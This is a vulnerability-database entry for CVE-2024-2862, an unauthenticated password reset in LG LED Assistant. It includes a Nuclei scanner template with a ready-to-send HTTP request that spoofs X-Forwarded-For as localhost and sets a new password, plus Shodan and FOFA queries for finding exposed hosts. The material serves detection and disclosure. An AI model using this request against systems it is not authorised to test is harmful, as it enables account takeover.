| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2024-2862 | 23 Dec 202521:03 | – | circl | |
| LG LED Assistant 授权问题漏洞 | 25 Mar 202400:00 | – | cnnvd | |
| CVE-2024-2862 | 25 Mar 202406:31 | – | cve | |
| CVE-2024-2862 Password reset vulnerability without authorization on LG LED Assistant | 25 Mar 202406:31 | – | cvelist | |
| CVE-2024-2862 | 25 Mar 202407:15 | – | nvd | |
| CVE-2024-2862 | 25 Mar 202407:15 | – | osv | |
| PT-2024-22495 | 24 Mar 202400:00 | – | ptsecurity | |
| CVE-2024-2862 | 7 Jan 202609:09 | – | redhatcve | |
| VulnCheck KEV: CVE-2024-2862 | 1 Feb 202600:00 | – | vulncheck_kev | |
| CVE-2024-2862 Password reset vulnerability without authorization on LG LED Assistant | 25 Mar 202406:31 | – | vulnrichment |
id: CVE-2024-2862
info:
name: LG LED Assistant - Unauthenticated Password Reset
author: beginee
severity: high
description: |
The /api/changePw endpoint in LG LED Assistant allows unauthenticated password resets when requests are considered to come from localhost. An attacker can spoof the X-Forwarded-For header with value 127.0.0.1 to trigger the behavior and receive a success response.
impact: |
Attackers can reset passwords of anonymous users, potentially leading to unauthorized access and account takeover.
remediation: |
Apply the latest security patches or update to the newest version of LG LED Assistant.
reference:
- https://lgsecurity.lge.com/bulletins/idproducts#updateDetails
- https://www.tenable.com/security/research/tra-2024-08
- https://nvd.nist.gov/vuln/detail/CVE-2024-2862
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-2862
epss-score: 0.51001
epss-percentile: 0.98797
cwe-id: CWE-640
metadata:
verified: true
max-request: 1
shodan-query: http.title:"LG LED Assistant"
fofa-query: icon_hash="195291629"
tags: cve,cve2024,lg,password,reset,lg,vkev
variables:
new_password: "Password@123"
http:
- raw:
- |
PUT /api/changePw HTTP/1.1
Host: {{Hostname}}
X-Forwarded-For: 127.0.0.1
User-Agent: test
Content-Type: application/x-www-form-urlencoded
newPw={{new_password}}&hostName={{hostname}}&to=to&user={{username}}&from=from
matchers:
- type: dsl
dsl:
- 'contains(body, "{\"resCode\":\"SUCCESS\"}")'
- 'status_code == 200'
condition: and
# digest: 490a0046304402205f1591e5c58c0c6f6b1ff0bf23aec7ba7790439c1e242d67a02ca4c840f04f1e02200f7de3d838a5fa66995402f7bdd0d196ceb3c84a8e0cf25aa18e9779a2bdd1e5:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation